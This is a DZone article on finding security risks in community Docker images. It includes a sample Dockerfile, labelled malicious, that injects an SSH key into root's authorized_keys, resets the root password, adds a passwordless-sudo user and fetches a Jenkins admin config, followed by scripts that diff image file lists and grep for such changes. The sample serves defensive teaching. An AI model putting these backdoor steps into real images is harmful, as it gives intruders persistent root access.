Over a million developers have joined DZone.
{{announcement.body}}
{{announcement.title}}

Explore Docker Image For Security Concern

DZone's Guide to

Explore Docker Image For Security Concern

Nowadays people are happy to use community Docker images. It's super fast and easy to setup infrastructure, compared to old black days. But watch out, security risks are hiding inside!

· Performance Zone
Free Resource

Evolve your approach to Application Performance Monitoring by adopting five best practices that are outlined and explored in this e-book, brought to you in partnership with BMC.

Nowadays people are happy to use community Docker images. It's super fast and easy to setup infrastructure, compared to old black days. But watch out, security risks are hiding inside!

Ignoring them could result in serious damages sooner or later.

How to Easily Identify Security Holes Inside Docker Images

Common Security Issues Inside Public Docker Images

Here is a simple example. (I doubt it will be misleading and hard to diagnose in the real world.)

  • In L18-19, an ssh key is injected to authorized_keys. If you start sshd, you're in danger.
  • In L22, root password has been reset. Not good, isn't it?
  • In L25-26, a malicious OS user has been added.
  • In L29-31, the user has been promoted as super admin, and he/she can run any commands without password!
  • In L34-36, your Jenkins has an unpleasant admin user now. Yes, Jenkins is hot and popular, and you can do a lot of things with it, but so can the hackers! This case represents security of application layer. It's certainly the most dangerous and difficult case.
 1: ########## How To Use Docker Image ###############
 2: ##
 3: ##  Install docker utility
 4: ##  Download docker image: 
 5: ##   docker pull denny/test:v1
 6: ##  Boot docker container: 
 7: ##   docker run -t -P -d --name my-test denny/test:v1 /bin/bash
 8: ##
 9: ##  Build Image From Dockerfile. 
10: ##   docker build -f Dockerfile -t denny/test:v1 --rm=false .
11: ##################################################
12: 
13: FROM ubuntu:14.04
14: MAINTAINER Denny <denny@dennyzhang.com>
15: 
16: RUN mkdir -p /root/.ssh && \
17:   # SSH login by key file
18:   echo "ssh-rsa AAAAB3NzaC1...lOvno6KN5 denny@dennyzhang.com" \
19:        >> /root/.ssh/authorized_keys && \
20: 
21:   # Reset root password
22:   echo 'root:ChangeMe1' | chpasswd && \
23: 
24:   # Add a malicious user
25:   useradd denny && \
26:   echo 'denny:ChangeMe1' | chpasswd && \
27: 
28:   # Add user to super admin
29:   echo '%denny ALL=(ALL:ALL) NOPASSWD: ALL' > \
30:         /etc/sudoers.d/admins && \
31:   chmod 400 /etc/sudoers.d/admins && \
32: 
33:   # Add superadmin user to 
34:   mkdir -p /var/lib/jenkins/users/superadmin && \
35:   wget -O /var/lib/jenkins/users/superadmin/config.xml \
36:     https://github.com/DennyZhang/devops_public/raw/tag_v2/doc/admin_conf_xml
37: 
38: CMD ["/bin/bash"]

Dump Change List Of Docker Images

Apparently, we still want to use community Docker images, we just need to rule out insecure ones. We also need to audit potential security risks as many as possible. Docker images are built directly or indirectly from golden images provided by trusted sources. Original golden docker images are usually clean.

So, What Changes Community Docker Images Have Made?

People can inspect change of Docker containers by "docker diff $container_id". Unfortunately, Docker doesn't support images comparison. Here is a feasible workaround:

  • List all files in golden image like below:
container_name="container1"
docker_image="ubuntu:14.04"
result_list="/tmp/list1.txt"
docker stop $container_name; \
 docker rm $container_name || true
# Start a container from golden image
docker run -t --name $container_name \
 -d $docker_image /bin/bash

# List all files inside the container
docker export $container_name | \
  docker run -i --rm ubuntu tar tvf - \
  > $result_list

# Check the list
tail $result_list
# drwxr-xr-x 0/0      0   2016-08-02 08:26 bin/
# -rwxr-xr-x 0/0  21112   2014-10-07 19:22 bin/bash
# -rwxr-xr-x 0/0  31152   2013-10-21 13:15 bin/bunzip2
# lrwxrwxrwx 0/0      0   2013-10-21 13:15 bin/bzcmp -> bzdiff
# -rwxr-xr-x 0/0   2140   2013-10-21 13:15 bin/bzdiff
# ...
  • List all files in the problematic image. Note: It might take several minutes for large images:

container_name="container2"
docker_image="denny/gitlab:v1"
result_list="/tmp/list2.txt"
docker stop $container_name; \
 docker rm $container_name || true
# Start a container from golden image
docker run -t --name $container_name \
 -d $docker_image /bin/bash

# List all files inside the container
docker export $container_name | \
  docker run -i --rm ubuntu tar tvf - \
  > $result_list

# Check the list
tail $result_list
  • Compare Two list:
result1="/tmp/list1.txt"
result2="/tmp/list2.txt"
diff_result="/tmp/diff.txt"

diff $result1 $result2 > $diff_result

tail $diff_result
# > drwxr-xr-x 0/0     0  2015-12-20 13:34 var/spool/postfix/pid/
# > drwx------ 103/0   0  2015-12-20 13:34 var/spool/postfix/private/
# > drwx--s--- 103/0   0  2015-12-20 13:34 var/spool/postfix/public/
# > drwx------ 103/0   0  2015-12-20 13:34 var/spool/postfix/saved/
  • Check for security vulnerability:
diff_result="/tmp/diff.txt"

# Check ssh authorized login
grep authorized_keys $diff_result

# check OS users
grep "etc/group" $diff_result

# Check sudo users
grep "etc/sudoers.d" $diff_result

# Check ssh key pair
grep ".ssh/.*id_rsa" $diff_result

# Add your checks in below
# ...
# ...

After the test, remember to remove useless containers.

More Reading: 5 Tips For Building Docker Image.

Learn tips and best practices for optimizing your capacity management strategy with the Market Guide for Capacity Management, brought to you in partnership with BMC.

Topics:
docker ,devops ,security best practices

Published at DZone with permission of Denny Zhang, DZone MVB. See the original article here.

Opinions expressed by DZone contributors are their own.

THE DZONE NEWSLETTER

Dev Resources & Solutions Straight to Your Inbox

Thanks for subscribing!

Awesome! Check your inbox to verify your email so you can start receiving the latest in tech news and resources.

X

{{ parent.title || parent.header.title}}

{{ parent.tldr }}

{{ parent.urlSource.name }}